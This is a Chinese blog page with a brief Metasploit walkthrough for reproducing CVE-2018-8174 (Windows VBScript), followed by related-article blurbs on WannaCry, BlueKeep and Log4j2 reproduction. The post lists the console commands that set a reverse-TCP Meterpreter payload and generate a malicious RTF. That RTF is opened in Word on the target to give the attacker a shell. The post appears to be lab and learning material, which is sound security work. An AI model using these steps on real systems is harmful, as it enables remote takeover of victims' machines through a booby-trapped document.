调用metasploit进行漏洞复现（应该是一个模式）

最新推荐文章于 2024-07-26 16:20:54 发布

Wh1te-小白

最新推荐文章于 2024-07-26 16:20:54 发布

阅读量549

点赞数

分类专栏： Meterpreter

本文链接：https://blog.csdn.net/weixin_42214273/article/details/83716866

版权

Meterpreter 专栏收录该内容

3 篇文章 0 订阅

订阅专栏

在GitHub上下载metasploit模块在本地

将.rb复制到 fileformat 目录/usr/share/metasploit-framework/modules/exploits/windows/fileformat/

将.rtf复制到 exploits 目录/usr/share/metasploit-framework/data/exploits/

启动模块

use exploit/windows/fileformat/CVE-2018-8174

set PAYLOAD windows/meterpreter/reverse_tcp

set srvhost 192.168.0.116

set lhost 192.168.0.116 exploit

进入 /root/.msf4/local/目录中的 msf.rtf 文件到目标主机上使用word文档打开

即可

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Wh1te-小白

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

【漏洞复现】Apache Spark 未授权访问漏洞

做自己喜欢的事，并将其发挥到极致！

08-31

4205

Apache Spark 未授权访问漏洞，详情请点击内容进入......

[系统安全] 二十五.WannaCry勒索病毒分析 (1)Python复现永恒之蓝漏洞实现勒索加密

杨秀璋的专栏

02-27

1万+

作者前文介绍了逆向分析之OllyDbg动态调试工具，包括INT3断点、反调试、硬件断点和内存断点。这篇文章将分享新知识，最近WannaRen勒索软件爆发（下图是安天的分析攻击流程），其名称和功能与WannaCry相似，所以接下来作者将连续分享WannaCry勒索病毒的复现及分析，第一篇文章将采用Github资源实现永恒之蓝漏洞利用及Windows7系统文件加密。希望这系列文章对您有所帮助，漫漫长征路，偏向虎山行。享受过程，一起加油~

参与评论您还未登录，请先登录后发表或查看评论

安全基础6 ---漏洞复现

qq_52016943的博客

07-23

704

一句话木马

metasploit复现

weixin_54584489的博客

11-23

3057

Meterpreter是Metasploit框架中的一个扩展模块，作为溢出成功以后的攻击载荷使用，攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能，比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等

metasploit-framework（MSF）多漏洞复现案例(一)

最新发布

WLWB9277的博客

07-26

850

该漏洞利用工具由一个名为”影子经济人”（Shadow Brokers）的神秘黑客组织于2017年4月14日公开的利用工具之一，该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击，攻击成功后将被用来传播病毒木马。漏洞介绍：通过利用远程桌面的3389端口，RDP协议进行攻击，从而导致机器蓝屏瘫痪。该漏洞的触发无需任何用户交互操作，这就意味着，存在漏洞的计算机只要联网，无需任何操作，就有可能遭遇黑客远程攻击，运行恶意代码等，极具破坏性！

cve-2017-0199&metasploit复现过程

weixin_30783913的博客

05-03

260

CVE-2017-0199 WORD/RTF嵌入OLE调用远程文件执行的一个漏洞。不需要用户交互。打开文档即中招首先更新msf到最新,据说最新版简化了利用过程,不需要开启hta这一步.但没测成功还是按老方法更新msf,增加国内源 1 #清华大学 2 #deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main ...

复现任务——漏洞渗透测试及Metasploit应用

m0_74087834的博客

12-29

1104

一、漏洞渗透测试 1、靶机(Windows)安装easy file sharing server（efssetup_2018.zip)，该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。 3、利用该漏洞，使得靶机运行计算器。见第六章PPT或PDF文档二、Metasploit应用 1、生成主控端、被控端。 2、获得靶机(Windows)控制权。 3、下载靶机上任意一个文件。见课本P127-133

MetaSploit实战

yuehuajiang7的博客

01-17

315

MS08-067和MS17-010 前期准备 kali Linux自带Metasploit，直接使用命令msfconsole启动即可 1.软件配置 2、建立搜索缓存（数据库）启动PostgreSQL数据库服务：service postgresql start监听5432端口初始化Metasploit数据库:msfdb init 查看数据库连接情况:msfconsole db_status 2.漏洞扫描目标靶机为 Windows xp professional（因为后来换了一个系统，所以ip会不一

metasploit漏洞利用模块的简单使用

发哥微课堂

01-05

3509

0x00：简介 exploits 是漏洞利用模块，漏洞利用是攻击者利用服务器的漏洞进行攻击的一种行为，其中包含了主流漏洞的攻击代码。 0x01：使用以 metasploitable2 为例，刚开始，可以通过 nmap 来查看下靶机的一些信息，信息搜集端口以及端口的服务和各版本是很重要的信息，nmap 的 sV 参数来获取系统及服务版本信息如下：可以看到给出的端口结果以及端口后面跑的...

初探 Metasploit 漏洞框架

GitChat

04-12

3277

Metasploit 就是一个漏洞框架。它的全称叫做 The Metasploit Framework，简称叫做 MSF。Metasploit 作为全球最受欢迎的工具，不仅仅是因为它的方便性和强大性，更重要的是它的框架。它允许使用者开发自己的漏洞脚本，从而进行测试。几乎任何公开通用漏洞都会被添加到 Metasploit 的武器库里，所以用好 Metasploit 是渗透致胜的关键。本场 Cha...

[网络安全自学篇] 六十七.WannaCry勒索病毒复现及分析（一）Python利用永恒之蓝及Win7勒索加密

热门推荐

杨秀璋的专栏

04-14

1万+

这是作者的网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您们喜欢，一起进步。前文分享了Vulnhub靶机渗透的DC-1题目，通过信息收集、CMS漏洞搜索、Drupal漏洞利用、Metasploit反弹shell、提权及数据库爆破获取flag。这篇文章将分享新知识，最近WannaRen勒索软件爆发（下图是安天的分析攻击流程），其名称和功能与WannaCry相似，所以接下来作者将连续分享WannaCry勒索病毒的复现及分析，希望这篇基础性文章对您有所帮助。

MS08-066溢出程序

10-17

漏洞CNNVD-201805-248的复现与提权

weixin_43434933的博客

06-23

1106

实验原理介绍（图文）本次实验实现漏洞CNNVD-201805-248的复现与入侵，以及后续的提权管理员和留后门操作。漏洞基本信息：漏洞名称：Microsoft Windows VBScript 引擎安全漏洞 CNNVD编号：CNNVD-201805-248 CVE编号：CVE-2018-8174 危害等级：高危漏洞类型：缓冲区错误威胁类型：远程发布时间：2018-05-10 漏洞简...

OISPT 内网安全项目组A2-Metasploit漏洞利用框架基础项目训练文档

Orserg Team

01-31

556

Orserg Team 官方文档-Metasploit 支持 Kali Metasploit A类基础支持你好安全人员！我是Orserg，一个高性能可开放托管组织，专针对初学安全人员提供最为简单并且完全免费的文档资料。很高兴认识你并且能让你从中学习到一些东西。专业术语要想使用工具请先了解它要表达的意思，和它能具体做什么？ 1.Exploit（渗透攻击）>攻击者通过系统，应用，服务中的安...

（菜鸟自学）漏洞利用与Metasploit

nbdlsplyb的博客

12-08

1242

什么是渗透测试?渗透测试指的是用黑客的方式来攻击你自己的或者是客户的IT系统，来找到其中的安全漏洞。因此,渗透测试人员要有目标系统管理人员的准许才能进行测试。这就是渗透测试人员和黑客之间的区别。什么是vulnerability?vulnerability是指软件、硬件或者操作系统中存在的安全漏洞。一个vulnerability可以像弱密码这样简单广也可能像缓冲区溢出或者SQL注入这样复杂。我们可以使用Nexpose来扫描vulnerability。什么是exploit?

简单漏洞复现_网络渗透测试

Radiency的博客

11-23

1644

利用easy file sharing server服务漏洞；远程控制目标，生成主控端、被控端，获得靶机控制权。

【网络安全---漏洞复现】log4j2漏洞详细的复现和利用过程(CVE-2021-44228)

m0_67844671的博客

09-10

2901

Log4j2远程代码执行漏洞复现(cve-2021-44228)，漏洞复现详细过程，cve-2021-44228，Log4j2

【网络安全】漏洞复现有多少种方式？

kali_Ma的博客

09-03

865

0x00 $this->show 造成命令执行 2021最新整理网络安全\渗透测试/安全学习（全套视频、大厂面经、精品手册、必备工具包）一>点我获取<一在 Home\Controller\IndexController 下的index中传入了一个可控参数，跟进调试看一下。 class IndexController extends Controller { public function index($n='') { $this->show('&l.

【权限提升】windows平台-提权项目&MSF&CS&溢出漏洞

今天是几号的博客

02-04

2537

简介：WES-NG是一个基于Windows系统信息实用程序输出的工具，该实用程序提供了操作系统易受攻击的漏洞列表，包括对这些漏洞的任何利用。powershell运行(上传是为了收集系统打的补丁信息，作用等同于systeminfo，当无法上传文件时，可以用systeminfo中的信息覆盖KB.json文件)简介：这是一款基于主机的漏洞扫描工具，采用多线程确保可以快速的请求数据，采用线程锁可以在向sqlite数据库中写入数据避免。覆盖项目KB.json文件(一定格式的操作系统信息补丁信息等)

复现CVE-2019-0708漏洞：MetaSploit攻击教程

"本课程详细介绍了如何使用MetaSploit框架对CVE-2019-0708（BlueKeep）漏洞进行攻击复现。作者是陈殷，内容来源于山丘安全攻防实验室。课程中涉及到的主要步骤包括安装MetaSploit的特定攻击模块，以及在Linux环境中...